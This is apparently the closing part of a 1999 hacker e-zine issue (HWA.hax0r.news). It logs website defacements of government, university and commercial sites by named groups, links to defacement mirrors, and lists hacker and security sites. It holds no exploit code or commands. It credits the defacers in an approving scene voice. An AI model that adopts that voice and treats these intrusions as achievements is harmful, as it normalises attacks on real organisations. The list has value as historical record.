[99.08.07] NT [^ImPiSh[]BlOoD^] Kassy (www.kassy.com)
[99.08.07] Sc [Hit2000] M Ostwest Galerie (CH) (www.ostwest-galerie.ch)
[99.08.07] So [LevelSeven] Radisson Seven Seas Cruises (www.rssc.com)
[99.08.07] NT [kl0wn krew] Vintage Realtors (www.vintagerealtors.com)
[99.08.07] NT [ ] Wichitaks Net (www.wichitaks.net)
[99.08.07] NT [^DarkManX^] Yale Com (AR) (www.yale.com.ar)
[99.08.07] So [Hi-Tech Hate] Malaysian Institute of Diplomacy and Foreign Relation (MY) (www.idhl.gov.my)
[99.08.07] So [gH] Internet Wrestling Zone (www.prowrestling.com)
[99.08.08] Li [Pakistan HC] Flag Group (www.flag-group.com)
[99.08.08] So [?] K CSRC Gov (CN) (www.csrc.gov.cn)
[99.08.08] So [keebler elves] #3 IDHL Gov (MY) (www.idhl.gov.my)
[99.08.08] So [kl0wn krew] 800-666-suck (www.1800666suck.com)
[99.08.08] So [kl0wn krew] Fantasy Car (www.fantasycar.com)
[99.08.08] So [kl0wn krew] Asian Slut (www.asianslut.com)
[99.08.08] So [kl0wn krew] Bi Studs (www.bistuds.com)
[99.08.08] So [Narr0w] M Naked Obsessions (www.nakedobsessions.com)
[99.08.08] So [kl0wn krew] M Republican Sex Addicts (www.republicansexaddicts.com)

Hacked: http://www.glrppr.uiuc.edu/
By: Mozy
Mirror: http://www.attrition.org/mirror/attrition/edu/www.glrppr.uiuc.edu

[99.08.10] Li [Elmer Fudd] KSCU 103.3 FM, The Underground Sound of Santa Clara (www.kscu103.com)
[99.08.10] NT [Uneek Technologies] State of Michigan Official Site (www.state.mi.us)
[99.08.10] So [ ] Wired Digital (www.wired.com)
[99.08.10] So [sQ] M Latif (www.latif.com)
[99.08.10] NT [Sarin] Federal Energy Regulatory Commission (www.ferc.fed.us)
[99.08.10] So [mozy] M Great Lakes Regional Pollution Prevention Roundtable (www.glrppr.uiuc.edu)

Hacked: http://www.inaoep.mx (third time)
By: Keebler elves
Mirror: http://www.attrition.org/mirror/attrition/mx/www.inaoep.mx-3

defaced: www.go.com
by: blitzen
mirror: http://www.attrition.org/mirror/attrition/com/infoseek.go.com/

and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links: (TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list, thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada........: http://www.hackcanada.com
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section?
email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]